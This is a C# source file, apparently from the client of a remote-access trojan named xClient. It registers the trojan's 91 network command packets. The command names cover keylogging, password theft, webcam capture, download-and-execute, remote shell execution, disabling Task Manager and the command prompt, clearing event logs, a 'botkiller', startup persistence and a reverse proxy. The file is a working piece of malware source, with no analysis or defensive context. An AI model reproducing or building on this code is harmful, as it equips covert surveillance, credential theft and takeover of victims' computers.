using System;
using xClient.Core.Packets.ClientPackets;
using xClient.Core.Packets.ServerPackets;
using xClient.Core.ReverseProxy.Packets;

namespace xClient.Core.Packets;

public class PacketRegistery
{
	public static Type[] GetPacketTypes()
	{
		return new Type[91]
		{
			typeof(GetAuthentication),
			typeof(DoClientDisconnect),
			typeof(DoClientReconnect),
			typeof(DoClientUninstall),
			typeof(DoDisplayMSG),
			typeof(DoRunBotkiller),
			typeof(DoClientRestoreDel),
			typeof(DoWebcamStop),
			typeof(DoAskElevate),
			typeof(DoDownloadAndExecute),
			typeof(DoUploadAndExecute),
			typeof(GetDesktop),
			typeof(GetProcesses),
			typeof(DoProcessKill),
			typeof(DoProcessStart),
			typeof(GetDrives),
			typeof(GetDirectory),
			typeof(DoDownloadFile),
			typeof(DoMouseEvent),
			typeof(DoKeyboardEvent),
			typeof(GetSystemInfo),
			typeof(DoVisitWebsite),
			typeof(DoWallpaper),
			typeof(DoShowMessageBox),
			typeof(DoTextToSpeech),
			typeof(DoHideTaskbar),
			typeof(DoHideDesktop),
			typeof(DoRegedit),
			typeof(DoSwapButtons),
			typeof(DoDisableTaskmgr),
			typeof(DoDisableCMD),
			typeof(DoClearClipboard),
			typeof(DoClearEvents),
			typeof(DoCD),
			typeof(DoClipboardSet),
			typeof(DoClientUpdate),
			typeof(GetMonitors),
			typeof(GetWebcams),
			typeof(GetWebcam),
			typeof(DoShellExecute),
			typeof(DoPathRename),
			typeof(DoPathDelete),
			typeof(DoShutdownAction),
			typeof(GetStartupItems),
			typeof(DoStartupItemAdd),
			typeof(DoStartupItemRemove),
			typeof(DoDownloadFileCancel),
			typeof(GetKeyloggerLogs),
			typeof(DoUploadFile),
			typeof(GetPasswords),
			typeof(DoLoadRegistryKey),
			typeof(DoCreateRegistryKey),
			typeof(DoDeleteRegistryKey),
			typeof(DoRenameRegistryKey),
			typeof(DoCreateRegistryValue),
			typeof(DoDeleteRegistryValue),
			typeof(DoRenameRegistryValue),
			typeof(DoChangeRegistryValue),
			typeof(SetAuthenticationSuccess),
			typeof(GetConnections),
			typeof(DoCloseConnection),
			typeof(GetAuthenticationResponse),
			typeof(SetStatus),
			typeof(SetStatusFileManager),
			typeof(SetUserStatus),
			typeof(GetDesktopResponse),
			typeof(GetProcessesResponse),
			typeof(GetDrivesResponse),
			typeof(GetDirectoryResponse),
			typeof(DoDownloadFileResponse),
			typeof(GetSystemInfoResponse),
			typeof(GetMonitorsResponse),
			typeof(GetWebcamsResponse),
			typeof(GetWebcamResponse),
			typeof(DoShellExecuteResponse),
			typeof(GetStartupItemsResponse),
			typeof(GetKeyloggerLogsResponse),
			typeof(GetPasswordsResponse),
			typeof(GetRegistryKeysResponse),
			typeof(GetCreateRegistryKeyResponse),
			typeof(GetDeleteRegistryKeyResponse),
			typeof(GetRenameRegistryKeyResponse),
			typeof(GetCreateRegistryValueResponse),
			typeof(GetDeleteRegistryValueResponse),
			typeof(GetRenameRegistryValueResponse),
			typeof(GetChangeRegistryValueResponse),
			typeof(ReverseProxyConnect),
			typeof(ReverseProxyConnectResponse),
			typeof(ReverseProxyData),
			typeof(ReverseProxyDisconnect),
			typeof(GetConnectionsResponse)
		};
	}
}
